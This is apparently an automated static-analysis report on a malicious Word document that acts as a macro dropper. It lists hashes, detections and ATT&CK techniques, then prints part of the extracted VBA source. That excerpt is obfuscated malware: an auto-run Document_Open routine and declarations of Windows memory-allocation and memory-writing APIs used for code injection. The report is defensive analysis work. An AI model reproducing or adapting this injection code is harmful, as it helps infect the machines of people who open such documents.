Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2ddcfd70f9fb7eb…

MALICIOUS

Office (OLE)

Size: 215.0 KB
Created: 2017-10-30 13:51:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 64cf4f4ec92dbf46394741692e9ada33
SHA-1: 52072805eb4d687964928c63b517b69a7a799c13
SHA-256: d2ddcfd70f9fb7eba158c1ce17438bd9328ddfaa6507428be4f802402b15ab9e
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and configured to execute shell commands, indicating an intent to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6360759-0' further supports its malicious nature as a dropper.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6360759-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6360759-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45372 bytes
SHA-256: a28c9e12bf1cd0f0c531f892034308476238350b57828b7402208f204e79fb28
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub numStyle()
ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers.NumberStyle = wdPageNumberStyleLowercaseLetter
End Sub
Private Sub Document_Open()
Dim chichewa As Variant
Dim tallgrass As String
begrimed = "blasphemously"
bearable = "insculptured"
woland.barroom
hospes = 10 + 90
teucrium = 8520 + 7
unthreatened = 105260 + 4
 Pmt 0, hospes, 27087, 31782, 7
End Sub
Attribute VB_Name = "blast"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then
Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any, ByVal sophistication As Any, ByVal dreaming As Any, ByVal achromatous As Any, ByVal assembler As Any, ByVal attemptable As Any) As LongPtr
Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll  " Alias _
"GetOverlappedResult" (ByVal aestival As Any, acquirable As Any, disa As Any, corgi As Any) As LongPtr
Public Declare PtrSafe Function doughface Lib "ntdll.dll" Alias _
"NtCreateEventPair" (humorsome As LongPtr, chromatogenous As LongPtr, ink As LongPtr) As LongPtr
Public Declare PtrSafe Function employe Lib "Kernel32.dll" Alias _
"CreateEventW" (ByVal nervy As LongPtr, revelling As LongPtr, tibetan As LongPtr, celluloid As LongPtr, domine As LongPtr) As Long
Public Declare PtrSafe Function utricle Lib "Shlwapi.dll  " Alias _
"SleepConditionVariableSRW" (ByVal malaprop As Any, damage As Any, tranquillization As Any, associate As Any) As LongPtr
Public Declare PtrSafe Function zocle Lib "Ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr, ByVal misinformaton As LongPtr, dispassionByVal As LongPtr, astonished As LongPtr, ByVal loge As LongPtr) As LongPtr
Public Declare PtrSafe Function classman Lib "Ntdll.dll  " Alias _
"AcquireSRWLockShared" (bearing As Any) As LongPtr
Public Declare PtrSafe Function vergent Lib "Ntdll.dll  " Alias _
"NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any, ByVal mormon As Any, ByVal bloodsucking As Any, ByVal asleep As Any) As LongPtr
Public Declare PtrSafe Function coastguard Lib "Shlwapi.dll" Alias _
"CreateFileWrapW" (amylolysis As LongPtr) As LongPtr
#End If

Public Function undebauched(manakin, avec, inflammable)
#If (7 * 4 + 5) > (7 - 2 * 1) And (35 - 7 * 5) * 4 < (Win64) Then
Dim asymptoptic As Byte
Dim voiced As Integer
Dim groundspeed As LongPtr
Dim abound As LongPtr
Dim bronchitic As LongPtr
Dim acervation As Byte
Dim anerythmon As LongPtr
Dim smitten As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim abound As Long
Dim omne As Long
Dim groundspeed As Long
Dim pericardial As Byte
Dim anerythmon As Long
Dim coactive As Long
Dim bronchitic As Long
Dim iodoprotein As String
Dim smitten As Long
Dim jurisdiction As Integer
Dim reproachfully As Integer
#End If
alopiidae = "misconjecture"
alopiidae = "eliminate"
abound = manakin
smitten = inflammable
cagliostro = Math.Round(424)
anerythmon = avec
commensurability = 23
vegetarian = 33824
neodarwinism = 361917
 Pmt 0, commensurability, 34165, 31309, 5

dismal = Rnd(211)
groundspeed = 122 - 125 + 2
vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic
alopiidae = motheaten
End Function
Function remuda(nuptse)
Dim gauger As Variant
Dim plexiglas As Long
Dim conjure As Integer
Dim swing As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim lamende As Long
Dim aloneness As LongPtr
legend = 11 - 35 + 32
Dim conqueror As LongPtr
Dim unmodernized As Byte
Dim bestially As Variant
Dim bornagain As LongPtr
Dim radiochlorine As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim aloneness A
... (truncated)